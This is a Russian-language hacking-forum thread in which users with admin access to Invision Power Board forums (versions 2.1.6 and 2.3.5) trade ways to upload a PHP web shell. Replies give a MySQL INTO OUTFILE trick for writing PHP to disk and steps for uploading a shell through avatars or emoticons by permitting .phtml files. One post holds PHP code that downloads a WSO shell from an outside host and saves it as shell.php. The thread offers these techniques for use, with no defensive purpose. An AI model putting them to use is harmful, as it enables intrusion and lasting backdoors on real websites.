ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.09.2006, 02:21
|
|
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
Провел на форуме:
770940
Репутация:
23
|
|
Проблема такая!
Имею доступ к админке IPB 2.1.6
но не могу залить шелл ни через атачи (меняет разрешение и PHP не выполняется наверно потомучто в папку upload)
также немогу через смайлы =( нет доступа
Какие есть еще варианты залить шелл??
|
|
|
25.09.2006, 14:52
|
|
Banned
Регистрация: 15.12.2005
Сообщений: 95
Провел на форуме:
1509352
Репутация:
132
|
|
Можно через мускуль...
к примеру:
CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ;
INSERT INTO `ibf_shell` ( `shl` ) VALUES (`пхп-код`);
SELECT `shl` FROM `ibf_shell` INTO OUTFILE `путь/имяфайла.php`
DROP TABLE `ibf_shell`
|
|
|
|
25.09.2006, 14:56
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
Для всех чтоыб не было проблемм с заливкой шеллов.
В версиях 1.*-2.0.* шелл заливаеться через смайлы.
Потом просто заходим по такому пути как залили http://www.site.pru/patch_forum/html/emoticons/name_shell.php.
В версиях 2.1.* шелл заливаеться через аватары.
Предварительно берём добавляем в типы файлов расшифрение .phtml и ставим mime тип application/octet-stream , следовательно там же указываем разрешение загрузку аватар и фотографий.
Потом добавляем в профилях пользователей заливка расшифрений .phtml и размер любой ( чем больше тем лучше).
Потом спокойно заливаем шелл и в свойствах смотрим путь до шелла.
Причины почему шелл не залился: Стоят права на папки avatars или html/emoticons, стоит safe-mod.
|
|
|
|
25.09.2006, 15:13
|
|
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
Провел на форуме:
770940
Репутация:
23
|
|
Сообщение от SanyaX
Для всех чтоыб не было проблемм с заливкой шеллов.
В версиях 1.*-2.0.* шелл заливаеться через смайлы.
Потом просто заходим по такому пути как залили http://www.site.pru/patch_forum/html/emoticons/name_shell.php.
В версиях 2.1.* шелл заливаеться через аватары.
Предварительно берём добавляем в типы файлов расшифрение .phtml и ставим mime тип application/octet-stream , следовательно там же указываем разрешение загрузку аватар и фотографий.
Потом добавляем в профилях пользователей заливка расшифрений .phtml и размер любой ( чем больше тем лучше).
Потом спокойно заливаем шелл и в свойствах смотрим путь до шелла.
Причины почему шелл не залился: Стоят права на папки avatars или html/emoticons, стоит safe-mod.
3 раз повторяю =) это версия 2.1.6 и через смайлы там в любом случае неплучится так как пра нехватает.
А второй вариан не прокатывает так как после запуска шелла выдает его исходный код, не вы выполняются сценарии в этои папке Uploads
|
|
|
|
25.09.2006, 15:22
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
Сообщение от Dimazzz
3 раз повторяю =) это версия 2.1.6 и через смайлы там в любом случае неплучится так как пра нехватает.
А второй вариан не прокатывает так как после запуска шелла выдает его исходный код, не вы выполняются сценарии в этои папке Uploads
ТЫ что чушь гонишь? Я тебе про аватары написал ДЛЯ 2.1.6. причём тут папка uploads?? Шелл грузиться в аватары + расширенеи надо .phtml. Вообщем в посте выше я всё описал. Читать надо внимательней.
|
|
|
|
30.04.2009, 01:15
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739
Репутация:
146
|
|
имеется IP.Board v2.3.5
но не могу залить шелл через атачи
также немогу через смайлы
пробывал через стили, тоже не выходит
может кто знает есчо способ??
|
|
|
|
30.04.2009, 04:04
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
navigat0r там возможно произвольное выполнение php кода , когда добовляеш системную настройку.
Воть нашол у себя, думаю должен понять 
http://depositfiles.com/files/17mnmm05v
Последний раз редактировалось warlok; 30.04.2009 в 04:14..
|
|
|
|
30.04.2009, 11:00
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739
Репутация:
146
|
|
делал также как и в видео, мне пишет что страница не найдена.МОжет оно в другое место сохранило?Как узнать куда сохраняет?
$data=implode('',file('http://navigat0r.kilu.de/shell/wso.txt'));
$fp=fopen('./shell.php','wb');
fputs($fp,$data);
fclose($fp);
правильно я написал??
|
|
|
|
30.04.2009, 11:06
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739
Репутация:
146
|
|
короче в этой админке так не катит.Пробывал в других, работает.Тут наверно куда-то в др место сохраняет.Чё можно есчо придумать?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
